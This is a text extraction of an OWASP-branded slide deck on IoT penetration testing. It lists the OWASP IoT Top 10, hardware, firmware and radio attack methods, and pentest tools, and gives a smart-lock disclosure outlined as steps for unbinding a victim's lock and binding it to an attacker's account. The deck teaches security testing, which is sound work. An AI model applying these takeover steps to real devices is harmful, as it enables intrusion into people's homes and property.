![Page 1: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/1.jpg)
IoT Device Penetration Testing-Shubham Chougule
![Page 2: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/2.jpg)
Agenda
What is Internet of Things ?
Application of IoT
OWASP Top 10 for IoT
Attack Vectors
Methodologies
Tools for IoT Lab
Examples
Best Practices
![Page 3: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/3.jpg)
What is IoT?
•IoT is the latest technology i.e Internet of Things.
• The Internet of Things (IoT) is the network of physical objects—devices,
vehicles, buildings and other items embedded with electronics, software,
sensors, and network connectivity—that enables these objects to collect
and exchange data
• World wide 50 billion devices will be connected to Internet by 2030
• Revenue growth is $1.9 trillion in 2013 to $7.1 trillion in 2020
![Page 4: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/4.jpg)
How IoT Works
![Page 5: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/5.jpg)
Applications of IoT
![Page 6: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/6.jpg)
1. Weak, guessable, or hardcoded passwords
2. Insecure network services
3. Insecure ecosystem interfaces
4. Lack of secure update mechanism
5. Use of insecure or outdated components
6. Insufficient privacy protection
7. Insecure data transfer and storage
8. Lack of device management
9. Insecure default settings
10. Lack of physical hardening
OWASP Top 10 IoT
![Page 7: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/7.jpg)
• Hardware
• Firmware
• Network
• Wireless Communications
• Mobile and Web applications
• Cloud API’s
The Attack Vectors
Source: attify
![Page 8: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/8.jpg)
• IoT Device hardware pentest
• Internal communications Protocols like UART,I2C, SPI etc.
• Open ports
• JTAG debugging
• Exacting Firmware from EEPROM or FLASH memory
• Tampering
IoT Pentesting Methodologies
![Page 9: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/9.jpg)
Dumping flash Memory
Open UART ports
JTAG Exploitation
Source : FireEye
![Page 10: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/10.jpg)
• Firmware Penetration testing
• Binary Analysis
• Reverse Engineering
• Analyzing different file system
• Sensitive key and certificates
• Firmware Modification
![Page 11: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/11.jpg)
Hardcoded MQTT credentials
File system
Extraction of .bin file
![Page 12: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/12.jpg)
• Radio Security Analysis
• Exploitation of communication protocols
• BLE,Zigbee,LoRA,6LoWPAN
• Sniffing Radio packets
• Jamming based attacks
• Modifying and replaying packets
![Page 13: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/13.jpg)
EXPLOITING BLE 4.0 COMMUNICATION
btsnoop_hci.log
![Page 14: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/14.jpg)
Analysis of radio signals using USRP
![Page 15: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/15.jpg)
• Mobile, Web and Cloud Application Testing
• Web dashboards- XSS, IDOR, Injections
• .apk and .Ios Source code review
• Application reversing
• Hardcoded api keys
• Cloud Credentials like MQTT, CoAP, AWS etc.
![Page 16: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/16.jpg)
Software Tools
Hardware Level Firmware Level Radio Security
Baudrate.py Binwalk Gatttool
Esptool Strings hcitool
Flashrom IDAPro GNURadio
Minicom Radare2 Killerbee
Screen Qumu
![Page 17: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/17.jpg)
Hardware Tools
HackRF
Bus Pirate
Jtagulator Ubertooth
Chip whisperer
TTL-USB Converter
Zigbee Sniffer
![Page 18: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/18.jpg)
Smart Lock Disclosure
![Page 19: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/19.jpg)
Getting QR code and Lock ID
![Page 20: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/20.jpg)
Getting the USER ID
![Page 21: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/21.jpg)
Unbind the Lock from victim’s account
![Page 22: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/22.jpg)
Bind the Lock to attacker’s account
![Page 23: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/23.jpg)
• Make hardware tamper resistant
• Provide for firmware updates/patches
• Specify procedures to protect data on device disposal
• Use strong authentication
• Use strong encryption and secure protocols
• Specify Destroy method if device get break down.
Best Practices
![Page 24: IoT Device Penetration Testing - OWASP · 5. Use of insecure or outdated components 6. Insufficient privacy protection 7. Insecure data transfer and storage 8. Lack of device management](https://reader036.vdocument.in/reader036/viewer/2022062603/5f07c3477e708231d41e9e60/html5/thumbnails/24.jpg)